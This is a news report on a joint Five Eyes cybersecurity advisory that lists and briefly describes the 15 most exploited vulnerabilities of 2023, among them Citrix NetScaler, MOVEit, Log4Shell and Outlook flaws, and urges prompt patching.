Cyber security agencies from the USA, Canada, the UK, Australia and New Zealand have co-authored a joint Cyber Security Advisory, listing the top 15 most frequently exploited vulnerabilities in 2023.
"In 2023, malicious cyber actors exploited more zero-day vulnerabilities to compromise enterprise networks compared to 2022," stated the advisory. "Malicious cyber actors continue to have the most success exploiting vulnerabilities within two years after public disclosure of the vulnerability."
The advisory found that patching systems lessens the utility of vulnerabilities and that "international cybersecurity efforts" to reduce the lifespan of zero-day vulnerabilities thwarted the efforts of malicious cyber actors.
The advisory states that organisations around the world patch these vulnerabilities immediately and deploy patch management systems:
CVE-2023-3519: This vulnerability affects Citrix NetScaler ADC and NetScaler Gateway and allows an unauthenticated user to cause a stack buffer overflow in the NSPPE process by using a HTTP GET request.
CVE-2023-4966: This vulnerability affects Citrix NetScaler ADC and NetScaler Gateway and allows session token leakage; a proof-of-concept for this exploit was revealed in October 2023.
CVE-2023-20198: This vulnerability affects Cisco IOS XE Web UI and allows unauthorized users to gain initial access and issue a command to create a local user and password combination, resulting in the ability to log in with normal user access.
CVE-2023-20273: This vulnerability affects Cisco IOS XE, following activity from CVE-2023-20198. It allows privilege escalation, once a local user has been created, to root privileges.
CVE-2023-27997: This vulnerability affects Fortinet FortiOS and FortiProxy SSL-VPN and allows a remote user to craft specific requests to execute arbitrary code or commands.
CVE-2023-34362: This vulnerability affects Progress MOVEit Transfer and allows abuse of an SQL injection vulnerability to obtain a sysadmin API access token. Malicious cyber actors are able to obtain remote code execution via this access by abusing a deserialisation call.
CVE-2023-22515: This vulnerability affects Atlassian Confluence Data Center and Server and allows exploit of an improper input validation issue. Arbitrary HTTP parameters can be translated into getter/setter sequences via the XWorks2 middleware and, in turn, allow Java objects to be modified at run time. The exploit creates a new administrator user and uploads a malicious plugin to get arbitrary code execution.
CVE-2021-44228: This vulnerability, known as Log4Shell, affects Apache’s Log4j library, an open source logging framework incorporated into thousands of products worldwide. It allows the execution of arbitrary code and an actor can exploit this vulnerability by submitting a specially crafted request to a vulnerable system, causing the execution of arbitrary code. The request allows a cyber actor to take full control of a system, then steal information, launch ransomware, or conduct other malicious activity. Malicious cyber actors began exploiting the vulnerability after it was publicly disclosed in December 2021.
CVE-2023-2868: This is a remote command injection vulnerability that affects the Barracuda Networks Email Security Gateway (ESG) Appliance and allows an individual to obtain unauthorized access and remotely execute system commands via the ESG appliance.
CVE-2022-47966: This is an unauthenticated remote code execution vulnerability that affects multiple products using Zoho ManageEngine and allows an unauthenticated user to execute arbitrary code by providing a crafted samlResponse XML to the ServiceDesk Plus SAML endpoint.
CVE-2023-27350: This vulnerability affects PaperCut MF/NG and allows a malicious cyber actor to chain an authentication bypass vulnerability with the abuse of built-in scripting functionality to execute code.
CVE-2020-1472: This vulnerability affects Microsoft Netlogon and allows privilege escalation. An unauthorised user may use non-default configurations to establish a vulnerable Netlogon secure channel connection to a domain controller by using the Netlogon Remote Protocol. Note: This CVE has been included in top routinely exploited vulnerabilities lists since 2021.
CVE-2023-42793: This vulnerability can affect JetBrains TeamCity servers and allows authentication bypass that allows remote code execution against vulnerable JetBrains TeamCity servers.
CVE-2023-23397: This vulnerability affects Microsoft Office Outlook and allows elevation of privilege. A threat actor can send a specially crafted email that the Outlook client will automatically trigger when Outlook processes it. This exploit occurs even without user interaction.
CVE-2023-49103: This vulnerability affects ownCloud graphapi and allows unauthenticated information disclosure. An unauthenticated user can access sensitive data such as admin passwords, mail server credentials, and license keys.
